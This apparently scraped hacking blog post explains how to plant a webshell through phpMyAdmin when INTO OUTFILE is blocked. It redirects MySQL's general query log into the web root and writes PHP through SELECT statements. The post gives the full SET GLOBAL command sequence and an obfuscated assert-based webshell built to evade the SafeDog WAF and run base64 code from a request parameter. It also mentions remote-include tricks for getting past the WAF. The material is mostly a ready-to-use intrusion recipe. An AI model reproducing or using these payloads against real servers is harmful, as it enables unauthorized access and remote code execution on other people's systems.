phpMyAdmin: A New Getshell Technique

Source: Internet
Author: User
Tags phpmyadmin

Intro: How do you getshell when there is a WAF in front of the site and INTO OUTFILE is disabled in MySQL?


The test environment is as follows:

    • OS: Windows 2003
    • WAF: SafeDog 4.0 official edition
    • phpMyAdmin: 4.7 (many versions work)
    • MySQL: 5.5+
    • PHP: 5.3
    • Apache: 2.x

In this environment INTO OUTFILE is disabled (typically via secure_file_priv, which restricts where SELECT ... INTO OUTFILE may write), and the WAF also intercepts attempts to write a file that way.
So we try a more creative route to getshell.
(MySQL root privileges are required: changing global variables needs SUPER.)

After logging in to phpMyAdmin, look at the global variables (the Variables tab, or SHOW GLOBAL VARIABLES) and find general_log_file.

This is the path of the general query log, which records every SQL statement the server receives, including the full statement text.

However, the log is only written when the general_log variable is ON, i.e. enabled.

So we set general_log to ON and then change general_log_file to the absolute path where we want our webshell, inside the web root.

Whenever general_log_file is changed, MySQL closes the old log and opens the new one, creating the file if it does not already exist. The file is created by the mysqld process, so this only works when the account mysqld runs under can write to the web root (on Windows the service often runs as LocalSystem, which can). Note that secure_file_priv does not restrict this path; it only applies to LOAD DATA, LOAD_FILE() and INTO OUTFILE.

The file now exists, and its contents are the log header followed by the most recent SQL statements:

    MySQLa, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
    TCP Port: 3306, Named Pipe: MySQL
    Time                 Id Command    Argument
                        121 Query       SHOW GLOBAL VARIABLES WHERE Variable_name="general_log_file"
                        121 Quit
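Putting the steps above together, here is the complete statement sequence as typed into the phpMyAdmin SQL tab, including the privilege check, the log_output check and the cleanup that the write-up skips. This is an added example, not code from the original article; the web root path, the original log path and the presence of SUPER on the account are assumptions, and the PHP in step 4 is only a marker showing that the statement lands in the file.

```sql
-- Added example (not from the original article): general_log getshell
-- sequence with checks and cleanup. Paths are assumptions; replace them
-- with the values SHOW GLOBAL VARIABLES returns on the target.

-- 1. Confirm the account holds SUPER (needed for SET GLOBAL). Look for
--    "GRANT ALL PRIVILEGES" or "SUPER" in the output.
SHOW GRANTS FOR CURRENT_USER();

-- 2. Record the current values so they can be restored afterwards.
--    log_output must include FILE, otherwise nothing is written to disk
--    (TABLE sends the log to mysql.general_log, NONE discards it).
SHOW GLOBAL VARIABLES WHERE Variable_name IN
  ('general_log', 'general_log_file', 'log_output', 'datadir');

-- 3. Point the log at a file inside the web root. Forward slashes avoid
--    backslash escaping on Windows. mysqld creates the file itself, so the
--    account mysqld runs under must be able to write to this directory.
SET GLOBAL log_output = 'FILE';
SET GLOBAL general_log_file = 'C:/www/shell.php';   -- assumed web root
SET GLOBAL general_log = 'ON';

-- 4. Every statement sent from now on is appended verbatim to shell.php.
--    PHP emits the log header and the "Query" prefix as plain text and
--    executes the <?php ... ?> block embedded in the string literal.
SELECT '<?php echo "general_log write ok"; ?>';

-- 5. Restore the original settings so logging continues where the
--    administrator expects it (use the values recorded in step 2).
SET GLOBAL general_log = 'OFF';
SET GLOBAL general_log_file = 'C:/mysql/data/host.log';   -- assumed original
```

The file will also contain phpMyAdmin's own housekeeping queries (SET NAMES, SELECT @@version and so on) sent between steps 3 and 5; PHP simply prints them as text around the executed block. Requesting shell.php over HTTP after step 4 should return the marker string together with that log text.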

Next we simply run a SQL query in phpMyAdmin; every statement we send is written to this shell.php.

Because of the WAF, we run the webshell as a remote include: the function name is placed at our remote address, the server fetches it and loads it into memory, we call that function directly, and it receives the PHP code we submit.

See the earlier article on Chopper (菜刀) detection evasion.

Attached below is a WAF-evading shell statement wrapped in a SQL query, for direct use when you run into this situation. The array lookups resolve $_ to the string assert, so the shell is assert(base64_decode($_REQUEST['username'])); in PHP 5, assert() evaluates a string argument as PHP code, and the payload arrives base64-encoded in the username parameter:

    SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>"

The WAF does not intercept this one:

That's it for this article. I've been busy lately and haven't updated much; thank you all for your continued support!

